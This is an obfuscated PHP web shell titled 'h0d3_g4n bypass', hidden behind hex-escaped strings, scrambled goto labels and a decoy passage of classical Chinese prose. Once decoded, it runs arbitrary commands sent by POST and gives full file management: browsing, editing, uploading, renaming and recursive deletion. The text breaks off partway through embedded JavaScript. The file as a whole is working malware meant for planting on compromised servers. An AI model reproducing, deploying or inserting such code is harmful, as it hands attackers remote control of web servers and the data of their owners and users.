PBUYX: goto KCUU1; goto e7Mgx; gPyPl: CKPCc: goto HugSK; OLnoZ: goto RNTtW; goto iRMAs; LKFe0: if (isset($_GET["\141\155\x62\151\154\55\154\143\55\143\x6f\153"])) { goto EScU9; } goto OUz9w; PHPv2: DuIjx: goto nSaoG; XaHRk: Ha1CD: goto FJnzl; RTLLb: goto NAO04; goto oBNL7; SIZJy: goto FrAnF; goto Nujht; kqq_v: x32CO: goto tQjNZ; Wm5Ol: ini_set("\x64\151\x73\x70\154\141\x79\137\145\162\162\x6f\x72\x73", 1); goto cgttD; q2WQU: goto Hllqy; goto m0cGm; Hqlgq: goto xMeqK; goto P0I9e; iw9Kb: goto OUMXD; goto bl3r9; NSlXc: rename($UkR4q, dirname($UkR4q) . "\57" . $_POST["\156\145\x77\x5f\x6e\x61\x6d\x65"]); goto b4_TE; TinPw: goto kjnab; goto fzOXC; qneaI: wPPcS: goto FOWLP; HHpkL: ygD9a: goto mntlU; emMNK: goto Sy4fq; goto PHPv2; ONeao: uA3RZ: goto kqq_v; r4Fqk: exit; goto wWu7z; Y4ahB: goto jBxvm; goto BlBH1; uUzhm: goto uA3RZ; goto X4Xnq; ungb2: foreach ($XP0ce as $AualM) { goto fXzTj; fXzTj: is_dir($AualM) ? rmdir($AualM) : unlink($AualM); goto NMRop; MvOPb: QkDu3: goto BjMvc; NMRop: BIV4G: goto MvOPb; BjMvc: } goto oMbFp; bon3k: goto Qf8bl; goto B26ut; jV_U_: goto U7VTp; goto GZKuK; VH0aU: if ($LIz_t) { goto gmiEv; } goto Hqlgq; OygNR: goto tcJG2; goto Jhh09; czWTl: goto hJwQv; goto FvEqe; DOlvG: goto t7EZV; goto qrJFl; el15I: wa_Wc: goto xr5jf; bSOgR: goto eiVj8; goto Pppen; COrn4: goto OKMCb; goto xTdIg; A3Q_F: $ICNfm = UPgkN($_POST["\145\x64\151\x74\137\146\151\x6c\x65"]); goto mHFXl; Yk2fG: bWUs0: goto i3fA6; Y0_hF: echo "\101\163\40\164\150\145\40\x73\x75\x6e\x20\163\x65\x74\40\142\x65\x68\x69\x6e\144\x20\x74\150\145\40\x6d\x6f\165\156\x74\141\x69\156\x73\x2c\x20\x74\150\145\40\163\x68\141\x64\x6f\x77\x73\40\x6f\146\x20\x74\x68\x65\40\160\145\157\x70\154\x65\40\163\x63\141\x74\164\145\162\x65\144\x2c\40\141\156\x64\40\164\x68\x65\x20\160\162\145\x66\145\x63\x74\x20\x72\x65\164\x75\162\156\x65\x64\x20\150\157\155\x65\54\x20\x66\x6f\154\x6c\x6f\x77\x65\x64\40\142\171\x20\x68\x69\x73\x20\147\165\x65\163\x74\163\56\40\x54\150\x65\x20\x77\157\x6f\144\163\x20\167\x65\162\145\x20\x73\150\141\x64\x79\54\x20\141\156\144\x20\x62\151\162\144\163\x6f\x6e\x67\40\x72\x6f\163\145\40\141\x6e\x64\x20\x66\x65\154\154\x3b\40\164\x68\145\40\x76\x69\163\151\164\x6f\x72\x73\x20\150\141\144\40\x64\x65\160\x61\162\x74\145\144\54\x20\141\156\x64\40\164\150\145\x20\142\151\162\x64\163\40\x72\x65\152\x6f\151\x63\145\x64\56\40\131\x65\164\40\x74\x68\x65\x20\x62\151\x72\144\x73\x20\x6b\x6e\x65\x77\x20\164\x68\145\x20\152\x6f\x79\40\x6f\x66\x20\164\x68\x65\x20\x6d\x6f\165\x6e\164\x61\151\156\x73\40\141\x6e\x64\40\146\x6f\162\x65\x73\x74\163\x2c\x20\142\x75\164\x20\x6e\x6f\164\40\164\150\145\40\152\157\171\x20\157\x66\x20\x6d\x61\156\x3b\x20\x6d\x61\x6e\x20\153\156\145\x77\40\x74\x68\145\x20\152\x6f\171\x20\157\146\40\x66\157\154\154\157\167\x69\x6e\x67\x20\x74\x68\145\40\160\x72\145\x66\x65\x63\164\x2c\x20\x62\165\164\40\156\x6f\x74\40\164\x68\145\40\x6a\157\x79\40\x74\x68\145\x20\x70\x72\145\146\145\x63\164\40\146\x6f\165\x6e\144\40\151\x6e\40\x74\150\145\151\162\x20\152\x6f\x79\x2e\40\x54\x68\145\40\157\156\145\x20\x77\x68\157\x20\x63\157\x75\x6c\144\x20\x73\x68\141\162\145\40\151\156\40\164\150\x65\151\162\40\152\x6f\171\x20\167\150\x65\156\x20\144\162\165\x6e\153\54\x20\x61\156\x64\x20\x64\145\x73\143\162\x69\x62\x65\x20\x69\x74\40\x69\x6e\x20\x77\162\x69\x74\151\156\x67\x20\x77\150\x65\156\40\x73\x6f\142\145\162\x2c\x20\x77\141\x73\40\x74\x68\x65\40\160\162\145\x66\145\x63\164\56\40\127\x68\x6f\x20\167\x61\163\x20\164\x68\151\x73\40\160\x72\145\146\145\x63\164\77\x20\342\200\213\342\200\213\x4f\165\171\x61\x6e\x67\40\130\x69\165\x20\x6f\x66\x20\114\165\154\x69\x6e\x67\56\xe5\xb7\xb2\xe8\x80\214\345\xa4\x95\351\x98\263\345\234\250\xe5\xb1\261\357\xbc\x8c\344\272\xba\xe5\xbd\261\xe6\225\243\xe4\271\xb1\357\274\x8c\xe5\244\252\xe5\256\x88\345\xbd\222\xe8\200\214\345\xae\276\xe5\xae\xa2\xe4\273\x8e\344\271\237\xe3\x80\x82\346\240\x91\346\236\227\351\x98\264\xe7\277\263\xef\274\214\351\xb8\xa3\xe5\243\xb0\xe4\xb8\212\344\xb8\x8b\xef\xbc\214\346\xb8\xb8\xe4\272\272\xe5\x8e\273\350\200\214\347\xa6\275\xe9\270\x9f\344\xb9\x90\344\271\x9f\343\x80\202\xe7\204\266\xe8\200\x8c\347\246\275\xe9\xb8\x9f\xe7\x9f\xa5\345\261\xb1\346\x9e\x97\xe4\xb9\x8b\344\271\220\xef\274\x8c\xe8\200\214\xe4\xb8\x8d\347\x9f\245\344\272\xba\344\271\213\xe4\271\220\xef\xbc\233\xe4\272\xba\347\237\xa5\xe4\xbb\x8e\345\244\252\xe5\256\210\346\270\270\350\200\x8c\xe4\xb9\220\xef\274\214\350\200\x8c\344\270\215\347\x9f\245\345\244\xaa\xe5\256\210\xe4\xb9\x8b\xe4\xb9\220\xe5\205\xb6\xe4\xb9\220\xe4\271\x9f\343\x80\x82\351\206\211\xe8\x83\xbd\xe5\x90\x8c\xe5\205\266\344\271\x90\xef\xbc\214\xe9\206\x92\350\x83\275\xe8\277\xb0\xe4\273\xa5\xe6\226\x87\350\x80\x85\357\274\x8c\xe5\xa4\xaa\345\xae\210\xe4\271\237\xe3\x80\202\345\244\252\xe5\xae\x88\xe8\260\x93\xe8\260\x81\xef\274\x9f\xe5\xba\220\xe9\x99\265\346\xac\xa7\351\230\xb3\xe4\xbf\xae\344\271\x9f\343\x80\202"; goto TinPw; K6w0_: JBsr3: goto v68DE; Z9z5D: mkdir($SdJpe . "\x2f" . $_POST["\x66\157\x6c\x64\x65\162\x5f\156\141\x6d\x65"], 0755, true); goto kK985; p3VNa: goto Tapmu; goto cNLrr; TgqJj: rPv2h: goto R1x8t; iRMAs: GZyJv: goto dZ7ja; GQKuH: goto v7r9V; goto ZzDWY; Qe4VE: echo "\74\160\162\x65\x20\x73\164\x79\x6c\145\x3d\42\x62\x61\143\x6b\x67\162\157\165\x6e\x64\x3a\x23\x66\x66\146\73\160\x61\144\144\x69\x6e\x67\x3a\61\x30\160\170\73\x62\157\162\144\145\162\55\162\141\x64\151\x75\163\72\70\x70\x78\x3b\x62\157\170\x2d\x73\150\141\x64\157\167\x3a\x30\40\62\160\170\40\x35\160\x78\x20\x72\147\x62\141\50\x30\x2c\x30\54\60\x2c\60\x2e\x31\51\73\x68\x65\151\147\150\x74\72\62\60\60\160\x78\x3b\x6f\x76\145\x72\146\x6c\157\x77\x3a\141\x75\x74\x6f\x3b\x22\76" . htmlspecialchars($lFvoz) . "\74\57\x70\162\x65\76"; goto uUzhm; EnLjb: fPNc5: goto Puu66; FlBBc: goto T2r06; goto hs11Z; FpxY2: gy_cL: goto I4hZT; V50CO: t7EZV: goto GWDir; mfpX3: Jsof1: goto HoOq4; yddM_: Sy4fq: goto jFeiz; MOoyG: YtWJu: goto NDU90; HugSK: goto ThsMR; goto mfpX3; oboRp: DT_0X: goto xTT9p; XDfyQ: m7ia0: goto hHDQL; gHHFO: wshCX: goto mUeAu; EKiTx: PhLD0: goto gH_5G; qGEXW: gtbvw: goto Vgotf; Fq1zv: goto yZvvO; goto HIUeE; tvHus: goto kzZ28; goto EnLjb; X32V8: d2oNm: goto Zsrxv; NR2I2: DAV9S: goto q3q2G; jiWET: IA1sG: goto HfN0A; X4Xnq: KID81: goto L1IKc; UGFn2: function qxWYG($oNysG) { goto h6FIT; kl38F: Dd3O1: goto Jrdcz; Mo64D: $ISw6j = @scandir($oNysG); goto cQIHO; XvzzM: tDhwL: goto IKmpZ; ppw0o: goto Mtiuw; goto kl38F; WFJCo: UCMiu: goto T9JVa; TnpYu: sGCqM: goto Mo64D; DvI3T: WKFoE: goto jtdsb; e3EDT: goto lSTra; goto JTABW; u29S8: uDVWj: goto Z9svI; T9JVa: if (!is_array($ISw6j)) { goto SVVMs; } goto SE2My; HD9Lf: SVVMs: goto Rvh7e; SE2My: goto dDprY; goto HD9Lf; Rvh7e: goto lh3Ld; goto IfmU0; cCr55: IrVie: goto umHmI; jtdsb: foreach ($ISw6j as $e8IW7) { goto FKBrR; FKBrR: goto tr8Zz; goto bBYPJ; HKG_9: goto McE6B; goto RG092; emr8m: cxVMn: goto hnaGj; R4POJ: rkAmO: goto iFcP7; tF2Xs: solVt: goto Zirov; bBYPJ: tr8Zz: goto LIOA9; iltFj: dXhty: goto r_f_D; qkLHX: goto HyTZl; goto tF2Xs; a3tU6: YhdG6: goto G_7Ek; rflz9: goto dXhty; goto bAE1q; yi1cH: goto solVt; goto iltFj; VPRZr: goto AGB8N; goto VFlaE; iFcP7: $q1099 = $oNysG . "\x2f" . $e8IW7; goto rflz9; FpRWB: goto i_SBK; goto R4POJ; bAE1q: HyTZl: goto xz10D; LIOA9: if ($e8IW7 == "\56" || $e8IW7 == "\x2e\x2e") { goto qxYfX; } goto HKG_9; Zirov: U1GK1: goto VPRZr; G_7Ek: goto U1GK1; goto FpRWB; ynzJn: McE6B: goto mmt4I; r_f_D: $tY5IT = array("\156\x61\x6d\x65" => $e8IW7, "\x74\171\160\145" => is_dir($q1099) ? "\106\x6f\x6c\x64\145\x72" : "\x46\x69\154\145", "\x73\x69\172\145" => is_dir($q1099) ? '' : KGUjC(filesize($q1099)), "\x70\145\x72\x6d\151\163\163\x69\x6f\156" => substr(sprintf("\x25\x6f", fileperms($q1099)), -4)); goto qkLHX; Ei1_F: goto YhdG6; goto Z4ni_; xz10D: is_dir($q1099) ? $b4pqC[] = $tY5IT : ($yGIpO[] = $tY5IT); goto yi1cH; RG092: qxYfX: goto Ei1_F; mmt4I: goto rkAmO; goto a3tU6; VFlaE: AGB8N: goto emr8m; Z4ni_: i_SBK: goto ynzJn; hnaGj: } goto cCr55; cQIHO: goto UCMiu; goto DvI3T; ZkqDJ: goto tDhwL; goto TnpYu; UGKWO: pexDy: goto e3EDT; IfmU0: KURvf: goto UGKWO; j2kc3: goto WKFoE; goto XvzzM; IKmpZ: $b4pqC = array(); goto k6Gmh; DLl6q: lh3Ld: goto igFTW; umHmI: goto KURvf; goto sF_GI; sF_GI: lSTra: goto fs8i7; JTABW: Mtiuw: goto QgKPQ; igFTW: return array(); goto ppw0o; fs8i7: return array_merge($b4pqC, $yGIpO); goto RNNG_; QgKPQ: dDprY: goto j2kc3; RNNG_: goto uDVWj; goto WFJCo; Jrdcz: $yGIpO = array(); goto ZkqDJ; k6Gmh: goto sGCqM; goto u29S8; h6FIT: goto Dd3O1; goto DLl6q; Z9svI: } goto bSOgR; QJh2D: $XP0ce = glob($yGIpO . "\x2f\x2a"); goto jOOP9; L1IKc: if (isset($_POST["\x6d\157\x64\x65"]) && $_POST["\x6d\157\x64\x65"] === "\x59") { goto RGrZD; } goto q2WQU; JhppK: echo file_get_contents($yGIpO); goto ZYewR; Zd0Ul: $SdJpe = Cxecj(); goto cPHnU; eZZ1V: v7r9V: goto KdATX; bXFcf: goto oQQfA; goto rcBEm; xOVxv: Mr4Wi: goto puUrU; CSRSj: goto dIrPE; goto JOBGZ; oDa1x: if (isset($_GET["\x67\145\x74\x5f\146\151\154\145\x6e\x61\x6d\x65"])) { goto VrtbU; } goto vivPf; awPa0: goto qBLiG; goto i1t23; gzr0a: FrAnF: goto Lu1PQ; cNLrr: NAO04: goto Z9z5D; T8Jnh: MSUP0: goto NKR0A; Z7imF: goto t7EZV; goto EWZ_j; jr3RV: r4XyP: goto u3TPD; LvO3r: zpuIX: goto RlgJo; Puu66: $K8tTK = $_POST["\x63\x6d\x64"]; goto p1UmK; cT09Y: Wfb3w: goto xZsAI; Xp1b0: if (file_exists($ICNfm)) { goto ukXNj; } goto nsxKi; IFH9H: goto Mr4Wi; goto HVZJN; pFdB5: goto qCoRS; goto cgRBe; A4Ii_: goto LxUhl; goto bKvlM; PYx9A: qtmDE: goto Q1mVS; KYf1I: echo "\x3c\144\151\x76\40\151\x64\75\42\156\x6f\164\x69\146\151\x63\x61\x74\x69\x6f\156\42\76" . $LIz_t . "\x3c\57\x64\x69\x76\76"; goto BD8Sb; o_gQx: goto D1D8S; goto JKpGt; BYsTC: goto x32CO; goto hYMcN; OdIy6: yq0qK: goto ou16S; ZYewR: goto Jsof1; goto e_Vvb; fEwn0: ThsMR: goto QJh2D; Va_aj: VeX0v: goto p3VNa; qtU6A: goto Ng18C; goto gzr0a; XNWHg: goto B2Zy1; goto Pt4eE; n3OIL: goto InqKp; goto rHsag; GIczr: goto Bl6rN; goto sPedd; zO4Ru: A7n_q($SdJpe); goto s5PqT; fzOXC: BggID: goto fSrc5; D8fTC: echo "\x3c\x21\104\x4f\103\x54\131\x50\105\x20\x68\x74\155\x6c\76\x3c\x68\164\x6d\154\x3e\74\150\x65\x61\x64\x3e\74\155\145\164\x61\x20\x6e\141\x6d\x65\x3d\42\166\151\x65\x77\160\x6f\x72\164\x22\x20\143\157\156\164\x65\156\164\x3d\42\x77\x69\x64\164\x68\75\144\x65\x76\151\143\x65\x2d\x77\151\x64\164\150\x2c\x20\151\x6e\x69\164\151\x61\x6c\x2d\163\143\x61\154\x65\x3d\61\x22\x3e\74\x73\x74\x79\154\x65\x3e\x62\x6f\144\x79\x7b\x66\x6f\156\x74\x2d\x66\x61\x6d\x69\154\x79\x3a\x27\x53\145\147\157\x65\40\x55\x49\x27\x2c\x54\x61\x68\x6f\155\141\x2c\163\141\156\x73\55\x73\145\x72\x69\x66\73\155\141\162\147\x69\x6e\x3a\x32\x30\160\x78\73\x62\x61\143\x6b\x67\x72\157\165\156\144\x3a\x23\146\64\x66\66\x66\70\x3b\143\157\154\x6f\x72\72\x23\x33\x33\63\x3b\x7d\150\61\x7b\x63\157\x6c\x6f\x72\72\x23\x33\x33\63\73\x7d\x2e\x62\162\145\141\x64\x63\x72\165\155\x62\40\141\x7b\164\145\170\164\x2d\144\145\x63\x6f\x72\x61\x74\x69\157\156\72\156\x6f\156\145\x3b\155\x61\x72\x67\151\156\55\x72\x69\147\150\164\x3a\x35\x70\170\73\143\157\154\157\x72\x3a\x23\63\x34\71\x38\144\x62\x3b\175\56\142\x72\x65\141\144\143\x72\x75\155\142\x20\x61\x3a\x68\x6f\166\145\162\173\164\145\170\164\55\144\145\x63\x6f\x72\141\x74\151\x6f\x6e\72\x75\156\144\x65\162\x6c\x69\156\x65\73\x7d\56\164\157\x6f\154\142\x61\x72\x7b\144\151\163\x70\x6c\x61\171\72\146\154\x65\170\x3b\146\x6c\145\170\55\x77\x72\141\x70\72\x77\162\141\160\x3b\147\141\x70\x3a\x31\60\x70\x78\x3b\x6d\141\x72\x67\x69\156\x2d\142\x6f\x74\x74\157\155\x3a\x32\60\x70\x78\73\141\154\x69\147\156\x2d\x69\x74\x65\x6d\x73\x3a\x66\x6c\x65\170\x2d\163\x74\x61\x72\x74\73\175\56\x74\x6f\x6f\x6c\x62\141\162\40\146\157\162\155\173\x64\x69\x73\x70\154\141\171\x3a\146\x6c\145\x78\x3b\146\154\145\x78\x2d\144\x69\162\145\143\164\x69\x6f\x6e\x3a\x63\x6f\154\165\155\156\x3b\147\x61\160\72\65\160\x78\x3b\142\x61\x63\153\x67\162\x6f\165\x6e\x64\x3a\x23\x66\146\146\73\160\x61\144\144\x69\156\147\x3a\61\60\x70\170\73\x62\x6f\x72\x64\x65\x72\x2d\162\x61\144\x69\x75\x73\72\x38\160\170\x3b\x62\157\170\55\x73\150\141\x64\157\x77\x3a\60\40\62\x70\x78\x20\65\160\170\40\162\x67\142\x61\50\x30\x2c\60\x2c\60\54\x30\x2e\61\51\x3b\x7d\x69\x6e\160\165\164\133\164\171\160\x65\75\164\x65\170\x74\x5d\54\164\x65\170\164\x61\162\x65\x61\x2c\151\x6e\x70\165\164\x5b\164\171\160\145\x3d\x66\151\154\145\x5d\173\x70\x61\144\x64\x69\x6e\x67\72\x38\160\170\x3b\x62\x6f\x72\144\145\x72\72\x31\x70\x78\40\x73\x6f\154\151\144\40\43\x63\x63\143\x3b\142\x6f\162\144\x65\x72\x2d\162\x61\x64\151\x75\163\72\65\160\x78\73\146\x6f\x6e\x74\55\x73\x69\x7a\145\72\61\64\160\x78\x3b\175\142\165\164\x74\x6f\156\x2e\142\165\164\x74\x6f\x6e\173\160\x61\x64\x64\151\x6e\x67\72\x38\x70\x78\40\x31\65\x70\170\73\142\x61\x63\153\x67\162\157\165\x6e\144\72\43\x33\64\71\70\144\142\x3b\143\157\154\157\162\72\x23\x66\x66\146\x3b\x62\x6f\x72\x64\145\162\72\156\x6f\156\145\73\142\157\162\144\x65\162\55\x72\141\x64\x69\x75\163\x3a\65\x70\x78\73\x63\165\162\163\157\162\72\x70\x6f\151\x6e\x74\x65\x72\73\x74\x72\141\x6e\x73\x69\164\151\x6f\x6e\x3a\x30\x2e\63\163\73\175\142\165\164\x74\157\156\56\142\165\164\164\x6f\x6e\72\150\x6f\166\x65\x72\x7b\x62\x61\x63\153\x67\x72\x6f\165\156\x64\72\43\62\x39\70\60\142\71\73\x7d\x74\141\x62\x6c\145\173\x77\151\144\x74\150\72\x31\x30\60\45\x3b\142\x6f\162\144\x65\x72\55\x63\x6f\154\x6c\141\x70\163\x65\x3a\143\x6f\x6c\154\141\x70\x73\145\73\x62\x61\x63\153\147\x72\x6f\x75\156\x64\72\x23\146\x66\146\x3b\142\157\x72\144\x65\162\x2d\x72\141\x64\151\165\x73\x3a\x38\160\170\x3b\157\x76\x65\x72\146\x6c\157\x77\72\150\x69\144\x64\145\x6e\x3b\x62\157\170\x2d\x73\x68\x61\x64\157\167\x3a\60\40\62\160\170\40\65\160\170\40\x72\x67\142\141\50\x30\54\x30\x2c\x30\x2c\60\56\61\x29\x3b\175\x74\x68\x2c\x74\144\173\160\141\x64\144\151\156\147\72\61\62\160\170\40\61\65\x70\170\73\164\145\170\x74\x2d\141\x6c\x69\x67\x6e\x3a\154\145\x66\x74\73\x7d\164\150\x7b\142\x61\143\153\147\162\157\x75\x6e\x64\72\x23\x33\x34\x39\x38\144\142\x3b\143\157\154\157\162\72\43\146\x66\x66\73\x66\x6f\x6e\x74\x2d\x77\x65\x69\x67\x68\164\x3a\x6e\157\x72\x6d\141\154\x3b\175\164\x72\x3a\156\164\x68\55\143\x68\x69\x6c\144\x28\145\166\145\156\x29\x7b\x62\x61\143\x6b\x67\x72\x6f\x75\156\144\x3a\43\146\71\x66\x39\x66\71\x3b\175\164\x72\72\x68\x6f\x76\x65\162\173\142\x61\x63\x6b\x67\x72\x6f\165\156\144\x3a\43\x66\61\146\61\146\61\73\x7d\x61\56\x61\x63\x74\151\x6f\156\55\154\x69\x6e\153\x7b\143\x6f\154\x6f\162\72\43\x33\x34\71\x38\x64\142\x3b\164\145\170\x74\x2d\x64\145\143\x6f\x72\141\164\x69\x6f\x6e\72\156\157\x6e\145\x3b\x6d\141\x72\147\151\156\55\162\x69\x67\150\x74\x3a\x35\160\170\x3b\x7d\141\x2e\x61\x63\x74\x69\x6f\x6e\55\154\151\x6e\x6b\x3a\x68\x6f\x76\145\162\173\164\x65\x78\x74\x2d\144\145\143\157\x72\x61\x74\x69\157\x6e\x3a\165\156\x64\145\162\x6c\151\156\145\x3b\x7d\164\x65\170\x74\141\x72\x65\x61\x7b\x72\x65\163\x69\x7a\x65\x3a\x76\x65\162\164\x69\x63\x61\x6c\73\175\43\156\157\164\x69\x66\151\x63\x61\x74\151\x6f\x6e\173\144\151\163\x70\x6c\141\x79\72\156\x6f\156\x65\x3b\160\x6f\163\151\x74\151\157\x6e\x3a\x66\151\170\145\144\73\x74\x6f\160\x3a\62\x30\160\170\73\x72\151\147\150\x74\x3a\62\60\x70\170\73\142\x61\143\x6b\147\162\157\x75\156\144\x3a\x23\x32\x65\143\143\67\61\73\x63\x6f\x6c\157\x72\x3a\x23\x66\x66\x66\x3b\160\141\x64\x64\x69\x6e\147\72\61\x35\x70\x78\x3b\x62\x6f\162\144\x65\162\55\162\x61\144\x69\x75\x73\x3a\x38\x70\x78\73\x7a\x2d\x69\156\x64\145\x78\72\61\x30\x30\60\73\142\157\x78\55\163\150\141\144\x6f\167\x3a\x30\x20\62\x70\170\40\x31\60\160\170\x20\x72\x67\x62\x61\50\x30\x2c\x30\x2c\x30\54\x30\x2e\63\x29\73\175\56\155\x6f\144\x61\x6c\173\x64\x69\x73\160\154\141\171\x3a\x6e\x6f\156\145\x3b\x70\157\163\x69\x74\x69\157\156\x3a\146\x69\x78\x65\144\x3b\172\55\x69\156\x64\145\170\72\71\71\71\x3b\154\145\146\164\x3a\60\x3b\164\157\160\x3a\x30\73\x77\x69\x64\164\x68\x3a\61\60\60\45\x3b\150\x65\151\147\150\x74\x3a\61\60\x30\x25\73\x6f\x76\145\162\x66\x6c\157\167\x3a\141\165\164\x6f\73\x62\x61\143\x6b\x67\x72\x6f\165\156\x64\x3a\x72\x67\142\141\x28\60\x2c\x30\x2c\x30\x2c\60\x2e\66\51\73\x7d\56\155\157\x64\x61\154\55\143\157\x6e\x74\x65\156\x74\x7b\x62\141\x63\x6b\x67\x72\157\165\x6e\144\72\43\146\x66\x66\x3b\x6d\x61\162\x67\x69\x6e\72\x35\x25\x20\141\x75\x74\157\73\x70\x61\144\144\x69\156\x67\72\x32\x30\160\170\73\x62\x6f\162\x64\x65\x72\x2d\162\x61\144\151\165\163\x3a\x38\160\170\73\167\151\144\x74\150\x3a\x39\60\x25\x3b\155\141\170\x2d\x77\151\144\164\x68\x3a\x39\60\60\x70\170\73\x62\x6f\x78\55\163\x68\141\144\x6f\167\x3a\60\x20\62\x70\170\x20\x31\x30\160\x78\x20\x72\147\142\x61\50\x30\x2c\60\x2c\x30\54\x30\x2e\63\x29\73\x7d\x2e\x63\x6c\x6f\x73\x65\173\143\157\154\x6f\x72\72\43\141\x61\x61\73\x66\x6c\157\141\x74\72\x72\151\147\x68\164\x3b\146\157\x6e\164\x2d\163\x69\x7a\145\x3a\x32\70\160\x78\73\146\157\x6e\x74\55\x77\x65\151\x67\x68\164\72\142\157\x6c\144\x3b\x63\165\162\x73\157\162\x3a\160\x6f\x69\156\x74\x65\x72\x3b\175\56\143\x6c\157\163\x65\x3a\x68\x6f\x76\x65\x72\x7b\x63\157\154\x6f\162\72\x23\60\60\x30\73\175\164\145\170\164\x61\x72\x65\x61\43\155\157\x64\141\x6c\x2d\164\x65\170\164\141\x72\x65\x61\x7b\167\151\x64\164\x68\72\61\60\60\x25\x3b\x68\145\x69\x67\150\164\x3a\x34\60\x30\160\x78\73\146\157\x6e\x74\55\146\x61\x6d\x69\x6c\x79\72\x6d\157\156\x6f\x73\x70\x61\x63\145\73\146\x6f\156\164\x2d\x73\151\x7a\145\x3a\61\x34\x70\x78\x3b\x7d\x40\155\145\x64\x69\x61\x28\x6d\x61\170\x2d\x77\151\144\164\x68\72\67\x36\70\160\x78\x29\173\56\x74\157\157\154\142\x61\x72\x7b\x66\x6c\145\170\x2d\x64\151\162\x65\143\x74\x69\x6f\x6e\72\x63\157\154\165\155\156\x3b\x7d\x74\x65\x78\x74\141\162\145\x61\43\155\157\144\x61\x6c\55\164\145\170\x74\x61\x72\x65\141\x7b\150\x65\151\x67\x68\164\72\62\x35\x30\160\x78\73\x7d\x7d\74\x2f\163\164\x79\154\x65\x3e\x3c\57\x68\145\141\x64\x3e\x3c\x62\157\144\171\x3e\x3c\150\61\76\150\x30\144\x33\x5f\x67\x34\156\40\142\x79\160\141\163\x73\74\57\x68\x31\x3e"; goto VqadQ; wu81r: goto d02RY; goto RycM0; ic5n8: $LIz_t = "\x52\x65\x6e\x61\x6d\145\144\x20\x73\165\x63\x63\145\163\163\146\x75\x6c\154\x79\56"; goto AmLlN; dZ7ja: DO6oe: goto QdtC1; ZFMS2: $LIz_t = "\x46\x69\x6c\x65\40\x63\x72\145\141\x74\x65\x64\56"; goto LDi7v; teb_6: XlsNo: goto w5IC3; nsxKi: goto VeX0v; goto k_NNH; hYMcN: J111h: goto agt4v; y009N: if (!is_dir($yGIpO)) { goto l80ID; } goto S1pkd; xTdIg: jBxvm: goto FokbY; bqvAf: goto QSdT8; goto dsOA0; CC4cs: goto SSJCc; goto Da4ms; vivPf: goto A1gSF; goto guL7q; P1s7v: goto IA1sG; goto AfDhT; NLg0a: goto gAQuu; goto kVI7K; rHsag: xiq18: goto oDa1x; jD8Eo: IOUDO: goto EUeD5; QGqrt: U34yw: goto eXCfV; e7Mgx: ZEc_j: goto n2Q74; sD8oA: cVmCt: goto M6gMk; wWu7z: goto Cz0XC; goto mlEJO; RlgJo: goto giXaG; goto ONeao; RPSqo: if (isset($_POST["\x6e\x65\167\137\146\x69\154\x65"]) && !empty($_POST["\146\x69\154\145\x5f\156\x61\x6d\x65"])) { goto PuqfS; } goto GIczr; IhuIq: goto wa_Wc; goto NXPC4; kVI7K: T_Es7: goto xq24h; iBrtK: goto JBsr3; goto eUVf_; EUeD5: $LIz_t = "\106\x69\x6c\145\40\x75\x70\154\157\141\x64\145\144\x2e"; goto H_CFr; EAuRQ: KH0NT: goto Y0_hF; lD7O9: goto Y3Woe; goto QGqrt; JKpGt: B1Mmz: goto CSRSj; WUUAb: if (isset($_POST["\143\155\x64"]) && !empty($_POST["\x63\155\144"])) { goto Qn9ad; } goto iw9Kb; Lu1PQ: function upgKN($NK_pj) { goto FHMie; aAGJJ: goto ahUMN; goto l3FUF; ylQFP: goto fSDIp; goto pIBX2; gLPcg: dbXBp: goto MmNYf; Yp0Zg: ahUMN: goto cKOlZ; eegQ0: goto hHy2m; goto gLPcg; adOB_: goto niqVs; goto jpwBG; y9Lsh: goto HHe33; goto ON8s_; YU6aE: niqVs: goto y9Lsh; FHMie: goto DQPwr; goto o0drM; mNMeh: if ($ISw6j < strlen($NK_pj)) { goto fVAbz; } goto adOB_; v9v6w: HHe33: goto PFPoU; lHyEl: IaBwG: goto mNMeh; dG49r: goto dbXBp; goto NyuFn; ON8s_: hHy2m: goto VA5kR; R9kt1: goto UNP2B; goto v9v6w; b6qN0: goto m7FGQ; goto e0nvA; jpwBG: fVAbz: goto dG49r; JC4Wq: goto IaBwG; goto lHyEl; cKOlZ: Mc26H: goto eoJEy; o0drM: kE4Xh: goto VifsM; pIBX2: yKGe6: goto VDdVe; qA0CD: at3j0: goto JC4Wq; l3FUF: m7FGQ: goto qA0CD; NyuFn: UNP2B: goto M3KzT; j2ckS: $R83Ky = ''; goto R9kt1; eoJEy: goto kE4Xh; goto h52Ly; PFPoU: return $R83Ky; goto FxEh9; h52Ly: fSDIp: goto YU6aE; MmNYf: $R83Ky .= chr(hexdec($NK_pj[$ISw6j] . $NK_pj[$ISw6j + 1])); goto aAGJJ; VA5kR: goto at3j0; goto ylQFP; FxEh9: goto yKGe6; goto Yp0Zg; e0nvA: DQPwr: goto j2ckS; VifsM: $ISw6j += 2; goto eegQ0; M3KzT: $ISw6j = 0; goto b6qN0; VDdVe: } goto J061Q; dsOA0: e2gBh: goto wsx1b; Zsrxv: echo "\166\x61\162\40\x6d\157\144\x61\154\124\x65\170\x74\x61\162\145\141\x3d\x64\x6f\143\x75\155\145\156\x74\56\x67\145\164\105\154\145\155\145\x6e\164\x42\171\111\144\50\x27\155\157\x64\x61\x6c\x2d\x74\145\170\x74\141\162\145\x61\x27\x29\x3b\x76\141\162\40\x6d\157\144\x61\154\x4d\x6f\x64\x65\x3d\144\157\143\x75\x6d\145\x6e\x74\56\x67\x65\164\105\154\145\x6d\x65\x6e\x74\x42\x79\x49\144\x28\47\x6d\x6f\144\141\x6c\55\155\x6f\144\x65\x27\51\73\146\x75\156\x63\164\x69\157\x6e\x20\157\160\145\156\x45\144\151\164\115\157\x64\x61\154\x48\145\x78\x28\x68\x65\170\x50\x61\x74\x68\x29\173\166\141\x72\40\x78\150\162\x3d\156\x65\x77\40\130\115\x4c\x48\164\164\x70\x52\145\161\165\x65\163\x74\50\51\73\x78\x68\162\56\x6f\x70\145\156\x28\x27\x47\x45\x54\x27\54\47\x3f\x61\x6d\142\x69\x6c\x2d\x6c\x63\55\x63\x6f\153\x3d\x27\x2b\150\x65\x78\120\141\164\150\x2c\x74\x72\x75\x65\x29\73\x78\x68\x72\56\157\x6e\x72\x65\x61\x64\x79\163\164\x61\164\x65\143\150\x61\x6e\147\x65\x3d\146\165\156\143\x74\151\x6f\156\x28\51\x7b\151\146\x28\170\x68\x72\56\162\x65\141\x64\x79\123\x74\141\164\x65\x3d\x3d\64\46\x26\170\x68\x72\x2e\x73\164\x61\x74\x75\163\x3d\x3d\62\x30\60\51\173\x6d\x6f\144\x61\154\124\x65\170\164\x61\x72\145\141\x2e\x76\x61\x6c\165\x65\75\170\